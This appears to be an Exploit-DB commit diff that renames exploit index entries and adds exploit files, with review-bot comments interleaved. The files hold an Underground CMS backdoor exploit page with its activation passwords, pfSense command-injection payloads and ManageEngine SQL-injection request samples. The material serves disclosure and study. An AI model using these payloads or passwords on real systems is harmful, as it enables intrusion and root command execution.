DB: 2017-11-08

3 new exploits

Pine 4.x - From: Field Heap Corruption
Pine 4.x - 'From:' Heap Corruption
IBM DB2 db2start - Command Line Argument Local Overflow
IBM DB2 db2stop - Command Line Argument Local Overflow
IBM DB2 db2govd - Command Line Argument Local Overflow
IBM DB2 - 'db2start' Command Line Argument Local Overflow
IBM DB2 - 'db2stop' Command Line Argument Local Overflow
IBM DB2 - 'db2govd' Command Line Argument Local Overflow

F-Secure Internet GateKeeper for Linux < 2.15.484 (and Gateway < 2.16) - Privilege Escalation
F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Privilege Escalation

Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 - Backdoor
Microsoft Zero Administration Kit (ZAK) 1.0 / Office97 - Backdoor Access
IBM DB2 - db2start Format String Arbitrary Code Execution
IBM DB2 - db2stop Format String Arbitrary Code Execution
IBM DB2 - db2govd Format String Arbitrary Code Execution
IBM DB2 - 'db2start' Format String Arbitrary Code Execution
IBM DB2 - 'db2stop' Format String Arbitrary Code Execution
IBM DB2 - 'db2govd' Format String Arbitrary Code Execution

Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP Privilege Escalation

YaBB 9.11.2000 - search.pl Arbitrary Command Execution
YaBB 9.11.2000 - 'search.pl' Arbitrary Command Execution

Fortigate OS 4.x < 5.0.7 - SSH Backdoor
Fortigate OS 4.x < 5.0.7 - SSH Backdoor Access

Tecnovision DLX Spot - SSH Backdoor
Tecnovision DLX Spot - SSH Backdoor Access

FLIR Thermal Camera F/FC/PT/D - SSH Backdoor
FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access

Phorum 3.0.7 - 'auth.php3' Backdoor
Phorum 3.0.7 - 'auth.php3' Backdoor Access

Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion

Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor
Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor Access
pfSense 2.3.1_1 - Command Execution
ManageEngine Applications Manager 13 - SQL Injection
Offensive Security 2017-11-08 05:01:32 +00:00
parent 6f7af333ff
commit d70e1a2cf0
5 changed files with 1108 additions and 17 deletions


@ -2733,7 +2733,7 @@ id,file,description,date,author,platform,type,port
21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service",2002-11-02,anonymous,windows,dos,0
21982,platforms/windows/dos/21982.txt,"Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service",2002-11-04,"Tamer Sahin",windows,dos,0
21984,platforms/unix/dos/21984.c,"QNX 6.1 - 'TimeCreate' Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0
21985,platforms/linux/dos/21985.txt,"Pine 4.x - From: Field Heap Corruption",2002-11-07,lsjoberg,linux,dos,0
21985,platforms/linux/dos/21985.txt,"Pine 4.x - 'From:' Heap Corruption",2002-11-07,lsjoberg,linux,dos,0
21986,platforms/windows/dos/21986.pl,"Microsoft Windows Media Player 10 - '.avi' Integer Division By Zero Crash (PoC)",2012-10-15,Dark-Puzzle,windows,dos,0
21991,platforms/windows/dos/21991.py,"QQPlayer 3.7.892 - m2p 'quartz.dll' Heap Pointer Overwrite (PoC)",2012-10-15,"James Ritchey",windows,dos,0
22006,platforms/windows/dos/22006.txt,"EZHomeTech EzServer 7.0 - Remote Heap Corruption",2012-10-16,"Lorenzo Cantoni",windows,dos,0
@ -3025,9 +3025,9 @@ id,file,description,date,author,platform,type,port
23325,platforms/multiple/dos/23325.c,"BRS Webweaver 1.06 - HTTPd 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0
23337,platforms/windows/dos/23337.c,"Avaya Argent Office - DNS Packet Denial of Service",2001-08-07,"Jacek Lipkowski",windows,dos,0
23339,platforms/openbsd/dos/23339.c,"OpenBSD 2.x/3.x - Local Malformed Binary Execution Denial of Service",2003-11-04,"Georgi Guninski",openbsd,dos,0
23347,platforms/linux/dos/23347.txt,"IBM DB2 db2start - Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0
23348,platforms/linux/dos/23348.txt,"IBM DB2 db2stop - Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0
23349,platforms/linux/dos/23349.txt,"IBM DB2 db2govd - Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0
23347,platforms/linux/dos/23347.txt,"IBM DB2 - 'db2start' Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0
23348,platforms/linux/dos/23348.txt,"IBM DB2 - 'db2stop' Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0
23349,platforms/linux/dos/23349.txt,"IBM DB2 - 'db2govd' Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0
23361,platforms/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 - Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos,0
23374,platforms/windows/dos/23374.pl,"Qualcomm Eudora 5.x/6.0 - Spoofed Attachment Line Denial of Service",2003-11-12,"Paul Szabo",windows,dos,0
23375,platforms/linux/dos/23375.txt,"GNU Zebra 0.9x / Quagga 0.96 - Remote Denial of Service",2003-11-12,"Jonny Robertson",linux,dos,0
@ -5992,7 +5992,7 @@ id,file,description,date,author,platform,type,port
1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - Privilege Escalation",2005-09-24,kingcope,bsd,local,0
1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0
1267,platforms/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow Privilege Escalation",2005-10-20,qaaz,linux,local,0
1297,platforms/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 (and Gateway < 2.16) - Privilege Escalation",2005-11-07,"Xavier de Leon",linux,local,0
1297,platforms/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Privilege Escalation",2005-11-07,"Xavier de Leon",linux,local,0
1299,platforms/linux/local/1299.sh,"Linux chfn (SuSE 9.3/10) - Privilege Escalation",2005-11-08,Hunger,linux,local,0
1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Privilege Escalation",2005-11-09,"Charles Stevenson",linux,local,0
1310,platforms/linux/local/1310.txt,"Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation",2005-11-09,"Breno Silva Pinto",linux,local,0
@ -7348,7 +7348,7 @@ id,file,description,date,author,platform,type,port
19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local,0
19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0
19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001' Exploit",1999-01-07,"Richard M. Smith",windows,local,0
19144,platforms/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 - Backdoor",1999-01-07,"Satu Laksela",windows,local,0
19144,platforms/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 / Office97 - Backdoor Access",1999-01-07,"Satu Laksela",windows,local,0
19145,platforms/windows/local/19145.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 - Server Operator to Administrator Privilege Escalation: System Key",1999-01-11,Mnemonix,windows,local,0
19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 - Exploit",1999-01-03,"Dr. Mudge",linux,local,0
19158,platforms/solaris/local/19158.c,"Sun Solaris 2.5.1 PAM & unix_scheme - Exploit",1997-02-25,"Cristian Schipor",solaris,local,0
@ -8207,9 +8207,9 @@ id,file,description,date,author,platform,type,port
23341,platforms/hp-ux/local/23341.c,"HP-UX 10/11 - NLSPATH Environment Variable Format String (1)",2003-04-01,watercloud,hp-ux,local,0
23342,platforms/hp-ux/local/23342.c,"HP-UX 10/11 - NLSPATH Environment Variable Format String (2)",2003-04-01,watercloud,hp-ux,local,0
23343,platforms/hp-ux/local/23343.c,"HP-UX 11 - Software Distributor Lang Environment Variable Local Buffer Overrun",2002-12-11,watercloud,hp-ux,local,0
23344,platforms/linux/local/23344.txt,"IBM DB2 - db2start Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0
23345,platforms/linux/local/23345.txt,"IBM DB2 - db2stop Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0
23346,platforms/linux/local/23346.txt,"IBM DB2 - db2govd Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0
23344,platforms/linux/local/23344.txt,"IBM DB2 - 'db2start' Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0
23345,platforms/linux/local/23345.txt,"IBM DB2 - 'db2stop' Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0
23346,platforms/linux/local/23346.txt,"IBM DB2 - 'db2govd' Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0
23350,platforms/linux/local/23350.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (1)",2003-11-07,c0wboy,linux,local,0
23351,platforms/linux/local/23351.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (2)",2003-11-07,Bobby,linux,local,0
23352,platforms/linux/local/23352.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (3)",2003-11-07,"m00 security",linux,local,0
@ -9319,6 +9319,7 @@ id,file,description,date,author,platform,type,port
43057,platforms/windows/local/43057.txt,"HitmanPro 3.7.15 Build 281 - Kernel Pool Overflow",2017-10-26,cbayet,windows,local,0
43104,platforms/windows/local/43104.py,"Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Buffer Overflow (SEH)",2017-10-05,"Venkat Rajgor",windows,local,0
43109,platforms/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Privilege Escalation",2017-11-01,"Parvez Anwar",windows,local,0
43127,platforms/linux/local/43127.c,"Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP Privilege Escalation",2017-11-06,salls,linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -12318,7 +12319,7 @@ id,file,description,date,author,platform,type,port
20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0
20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0
20384,platforms/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 - Executable File Parsing",2000-11-06,Nsfocus,windows,remote,0
20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - search.pl Arbitrary Command Execution",2000-11-07,rpc,cgi,remote,0
20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - 'search.pl' Arbitrary Command Execution",2000-11-07,rpc,cgi,remote,0
20392,platforms/windows/remote/20392.rb,"NetDecision 4.2 - TFTP Writable Directory Traversal Execution (Metasploit)",2012-08-10,Metasploit,windows,remote,0
20394,platforms/unix/remote/20394.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (1)",1998-12-26,duke,unix,remote,0
20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (2)",1998-12-26,"jamez & dumped",unix,remote,0
@ -15582,7 +15583,7 @@ id,file,description,date,author,platform,type,port
39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)",2016-01-11,TOMIWA,windows,remote,21
39218,platforms/windows/remote/39218.html,"Trend Micro - node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0
39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0
39224,platforms/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
39224,platforms/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor Access",2016-01-12,operator8203,hardware,remote,22
39258,platforms/multiple/remote/39258.txt,"Alfresco - '/proxy?endpoint' Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
39259,platforms/multiple/remote/39259.txt,"Alfresco - '/cmisbrowser?url' Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
39455,platforms/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,multiple,remote,0
@ -15909,12 +15910,12 @@ id,file,description,date,author,platform,type,port
42724,platforms/windows/remote/42724.rb,"KingScada AlarmServer 3.1.2.13 - Stack Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,12401
42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69
42726,platforms/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",hardware,remote,0
42753,platforms/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor",2017-05-19,"Simon Brannstrom",multiple,remote,0
42753,platforms/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor Access",2017-05-19,"Simon Brannstrom",multiple,remote,0
42778,platforms/windows/remote/42778.py,"Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)",2017-09-25,sickness,windows,remote,80
42767,platforms/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80
42780,platforms/windows/remote/42780.py,"Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow",2017-09-25,"Charles Dardaman",windows,remote,0
42784,platforms/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",ios,remote,0
42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor",2017-09-25,LiquidWorm,hardware,remote,0
42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access",2017-09-25,LiquidWorm,hardware,remote,0
42790,platforms/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",linux,remote,0
42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0
@ -26431,7 +26432,7 @@ id,file,description,date,author,platform,type,port
20580,platforms/php/webapps/20580.txt,"webid 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0
20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 - 'admin.php3' Unverified Administrative Password Change",2000-01-06,"Max Vision",php,webapps,0
20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 - 'violation.php3' Arbitrary Email Relay",2000-01-01,"Max Vision",php,webapps,0
20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 - 'auth.php3' Backdoor",2000-01-06,"Max Vision",php,webapps,0
20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 - 'auth.php3' Backdoor Access",2000-01-06,"Max Vision",php,webapps,0
20598,platforms/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQL Injection",2012-08-17,loneferret,php,webapps,0
20627,platforms/php/webapps/20627.py,"IlohaMail Webmail - Persistent Cross-Site Scripting",2012-08-18,"Shai rod",php,webapps,0
20643,platforms/windows/webapps/20643.txt,"ManageEngine OpUtils 6.0 - Persistent Cross-Site Scripting",2012-08-18,loneferret,windows,webapps,7080
@ -31657,7 +31658,7 @@ id,file,description,date,author,platform,type,port
29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - 'includes_handler.php?base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - 'action.php?base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
29913,platforms/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion",2007-04-25,"ali & saeid",php,webapps,0
29913,platforms/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion",2007-04-25,"Ali & Saeid",php,webapps,0
29914,platforms/php/webapps/29914.txt,"Doruk100Net - 'Info.php' Remote File Inclusion",2007-04-26,Ali7,php,webapps,0
29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",php,webapps,0
29917,platforms/php/webapps/29917.php,"FlashComs Chat 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",php,webapps,0
@ -31841,7 +31842,7 @@ id,file,description,date,author,platform,type,port
30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection",2007-11-21,The-0utl4w,asp,webapps,0
30375,platforms/ios/webapps/30375.txt,"FileMaster SY-IT 3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps,0
30358,platforms/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - Exploit",2013-12-16,"Matt O'Connor",hardware,webapps,0
30792,platforms/php/webapps/30792.html,"Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor",2007-11-21,D4m14n,php,webapps,0
30792,platforms/php/webapps/30792.html,"Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor Access",2007-11-21,D4m14n,php,webapps,0
30356,platforms/php/webapps/30356.txt,"Wallpaper Script 3.5.0082 - Persistent Cross-Site Scripting",2013-12-16,"null pointer",php,webapps,0
30415,platforms/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",hardware,webapps,0
30357,platforms/php/webapps/30357.txt,"iScripts MultiCart 2.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Cross-Site Scripting / Cross-Site Request Forgery / Mass Accounts Takeover",2013-12-16,"Saadi Siddiqui",php,webapps,0
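Review bot: the rows around the 30792 rename are not in id order (30794, 30375, 30358, 30792, 30356, 30415, 30357), which makes this region of the CSV hard to diff and to search by id; the rename itself ('Search.Cache.Inc.php' Backdoor to Backdoor Access) matches the other Backdoor Access entries in this commit, but consider re-sorting this block of webapps rows while it is being touched.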
@ -38817,3 +38818,5 @@ id,file,description,date,author,platform,type,port
43117,platforms/php/webapps/43117.txt,"WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass",2017-11-04,"Colette Chamberland",php,webapps,0
43122,platforms/multiple/webapps/43122.txt,"Logitech Media Server 7.9.0 - 'favorites' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0
43123,platforms/multiple/webapps/43123.txt,"Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0
43128,platforms/php/webapps/43128.txt,"pfSense 2.3.1_1 - Command Execution",2017-11-07,s4squatch,php,webapps,0
43129,platforms/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",windows,webapps,9090
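Review bot: the two new rows drop the authentication requirement stated in the files they index. The header of 43128.txt reads `pfSense <= 2.3.1_1 Post-Auth Command Execution` and its description calls the bug post-authentication, and 43129.txt describes "multiple post-authentication SQL injection vulnerabilities", yet the CSV titles are "pfSense 2.3.1_1 - Command Execution" and "ManageEngine Applications Manager 13 - SQL Injection". Since the description column is what readers filter on, carry the precondition into the titles, for example "pfSense <= 2.3.1_1 - Authenticated Command Execution" and "ManageEngine Applications Manager 13 - Authenticated SQL Injection"; the `<=` also belongs in the pfSense title, since the file covers versions up to 2.3.1_1, not 2.3.1_1 alone.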


platforms/linux/local/43127.c Executable file

File diff suppressed because it is too large


@ -1,3 +1,4 @@
<!--
source: http://www.securityfocus.com/bid/26521/info
Underground CMS is prone to a backdoor vulnerability.
@ -5,5 +6,6 @@ Underground CMS is prone to a backdoor vulnerability.
Attackers can exploit this issue to gain unauthorized access to the application. Successful attacks will compromise the affected application and possibly the underlying webserver.
Underground CMS 1.4, 1.7, and 1.8 are vulnerable; other versions may also be affected.
-->
<head> <title>Ucms v. 1.8 Np exploit</title> <script type="text/javascript"> function sethost(seite) { document.host.action = seite + 'index.php?&q=test&e=1'; document.all.data.innerHTML = document.host.action; } </script> </head> <body onLoad="sethost('http://www.example.com/')" > <h1>Ucms v. 1.8 Np exploit</h1> Actual Request:<div id="data"></div> <br /> Host:<input type="text" value="http://www.ucmspage.de/" onKeyUp="sethost(this.value);" /> <form id="host" name="host" action="http://www.ucmspage.de/" method="POST"> Password:<input type="text" name="p" value="ZCShY8FjtEhIF8LZ"><br /> <!-- Additional info: You need a password to activate the backdoor we found these passwords: ZCShY8FjtEhIF8LZ (UCMS 1.8) mYM1NHtWtZk2KwrF (UCMS 1.4) wVCQUyhTga5Nmft1 (UCMS [?]) Just go into the file or similar files to find the passwords, for every version there is another password --> Phpcode:<br /> <textarea name="e" rows="20" cols="100"> phpinfo(); ?> &lt;/textarea&gt; <br /> <input type="submit" value="exploit"> </form> </body> <!-- It<49>s just a crime to do such thigs, so please use this exploit just for knowledge and not to destroy the warez pages... thank you for you attention... Have a nice day --> </html>
<head> <title>Ucms v. 1.8 Np exploit</title> <script type="text/javascript"> function sethost(seite) { document.host.action = seite + 'index.php?&q=test&e=1'; document.all.data.innerHTML = document.host.action; } </script> </head> <body onLoad="sethost('http://www.example.com/')" > <h1>Ucms v. 1.8 Np exploit</h1> Actual Request:<div id="data"></div> <br /> Host:<input type="text" value="http://www.ucmspage.de/" onKeyUp="sethost(this.value);" /> <form id="host" name="host" action="http://www.ucmspage.de/" method="POST"> Password:<input type="text" name="p" value="ZCShY8FjtEhIF8LZ"><br /> <!-- Additional info: You need a password to activate the backdoor we found these passwords: ZCShY8FjtEhIF8LZ (UCMS 1.8) mYM1NHtWtZk2KwrF (UCMS 1.4) wVCQUyhTga5Nmft1 (UCMS [?]) Just go into the file or similar files to find the passwords, for every version there is another password --> Phpcode:<br /> <textarea name="e" rows="20" cols="100"> phpinfo(); ?> </textarea> <br /> <input type="submit" value="exploit"> </form> </body> <!-- It<49>s just a crime to do such thigs, so please use this exploit just for knowledge and not to destroy the warez pages... thank you for you attention... Have a nice day --> </html>
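Review bot: the un-escaping of `&lt;/textarea&gt;` to `</textarea>` is correct, since the escaped form left the textarea unclosed and the following `<input type="submit">` inside its text content, but two defects on the same line survive into the new version: the trailing comment still reads `It<49>s just a crime`, where `<49>` is an encoding artifact standing in for an apostrophe (`It's`), and the document ends with `</html>` without ever opening `<html>` (the first tag is `<head>`). Both are worth fixing in the same cleanup, as the commit is already normalising this file's markup.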

platforms/php/webapps/43128.txt Executable file

@ -0,0 +1,27 @@
# Exploit Title: pfSense <= 2.3.1_1 Post-Auth Command Execution
# Date: 11-06-2017
# Exploit Author: s4squatch (Scott White - www.trustedsec.com)
# Vendor Homepage: https://www.pfsense.org
# Version: 2.3-RELEASE
# Vendor Security Advisory: https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc
1. Description
pfSense <= 2.3.1_1 is affected by a post-authetication os command injection vulnerability in auth.inc via the /system_groupmanager.php page (System menu-->User Manager-->Groups) in the handling of the members[] parameter. This allows an authenticated WebGUI user with
privileges for system_groupmanager.php to execute commands in the context of the root user.
2. Proof of Concept
'`ifconfig>/usr/local/www/ifconfig.txt`'
'`whoami>/usr/local/www/whoami.txt`'
Command output can then be viewed at the webroot:
http://<address>/ifconfig.txt
http://<address>/whoami.txt
Another POC: 0';/sbin/ping -c 10 192.168.1.125;'
3. Solution
Upgrade to the latest version of pfSense (2.3.1_5 on is fixed). This may be performed in the web interface or from
the console. See https://doc.pfsense.org/index.php/Upgrade_Guide Furthermore, the issues can be mitigated by restricting access to the firewall GUI both with firewall rules and by not allowing untrusted users to have accounts with GUI access, and by not granting untrusted administrators access to the pages in question.
Issue was responsibly disclosed to pfSense (security@pfsense.org) on 06/08/2016 and fixed 06/09/2016!
Thank you to Jim P and the pfSense team for the impressive response time.
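Review bot: the version statements in this file do not agree: the `# Version:` line says `2.3-RELEASE`, the title says `<= 2.3.1_1`, and the solution says `2.3.1_5 on is fixed`; settle on one affected range (the linked advisory pfSense-SA-16_08 should decide it) and restate the solution as "fixed in 2.3.1_5 and later". Two typos on the description line: `post-authetication` should be `post-authentication`, and `System menu-->User Manager-->Groups` reads better as `System -> User Manager -> Groups`. The dates mix formats (`11-06-2017` in the header, `06/08/2016` in the disclosure line) while the CSV row uses ISO `2017-11-07`; use ISO throughout. Finally, the mitigation paragraph could name the artifacts this PoC leaves behind, namely its output files in the webroot (`/usr/local/www/ifconfig.txt`, `whoami.txt`), so that administrators know unexpected files there are an indicator to check for.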


@ -0,0 +1,55 @@
ManageEngine Applications Manager version 13 suffers from multiple post-authentication SQL injection vulnerabilities.
Proof of Concept 1 (name= parameter is susceptible):
POST /manageApplications.do?method=insert HTTP/1.1
Host: 192.168.1.190:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 407
Referer: http://192.168.1.190:9090/admin/createapplication.do?method=createapp&grouptype=1
Cookie: testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJESNNXc4I4Ts1omY%2FiCOo47Ch6sZEoC7bRr4SfuGTOVfjv2JZAH6cun8; liveapm-_zldt=cfa03604-1dc4-4155-86f7-803952114141; diagnosticsAlarmTable_sortdir=down; JSESSIONID_APM_9090=A16B99B2C0C09EB6060B4372660CFBC3
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=66ef9ed22c8b3a67da50e905f7735abd&addmonitors=0&name=My+App2&description=Description....This+service+is+critical+to+our+business&grouptype=1&mgtypestatus%231001=on&mgtypes_1001=1&mgtypes_1007=0&mgtypes_1008=0&mgtypestatus%231002=on&mgtypes_1002=1&mgtypestatus%231003=on&mgtypes_1003=1&mgtypestatus%231004=on&mgtypes_1004=1&mgtypestatus%231006=on&mgtypes_1006=1&locationid=
Proof of Concept 2 (crafted viewProps yCanvas field):
POST /GraphicalView.do? HTTP/1.1
Host: 192.168.1.191:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.191:9090/GraphicalView.do?&method=createBusinessService
Content-Length: 457
Cookie: JSESSIONID_APM_9090=53E8EBC71177607C3A7FE03EB238887E
Connection: close
&method=saveBusinessViewPropsForADDM&viewProps={"displayProps":{"showLabel":true,"showOnlyMGs":false,"showOnlyTopMGs":false,"showOnlyCritical":false,"showOnlyMGStatus":false,"backgroundColorVal":"#FFFFFF","lineColorVal":"#888c8f","textColorVal":"#444444","lineThickness":"2.5","lineTransparency":1,"xCanvas":-23.089912210349002,"yCanvas":0},"coordinates":"{\"totalNumberOfNodes\":0,\"nodeIdList\":[]}"}&haid=10000106&nodeIdVsResourceId={"node_1":"10000106"}
Proof of Concept 3:
POST /GraphicalView.do HTTP/1.1
Host: 192.168.1.191:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.191:9090/showapplication.do?haid=10000106&method=showApplication&selectM=flashview&viewid=1
Content-Length: 101
Cookie: JSESSIONID_APM_9090=68C19C45D63C6FD102EB3DF25A8CE39D; testcookie=; am_username=; am_check=; am_mgview=availability
Connection: close
method=getLatestStatusForJIT&haid=10000106&viewid=1&currentime=1509869908111&resourceIDs=(0000106,0)
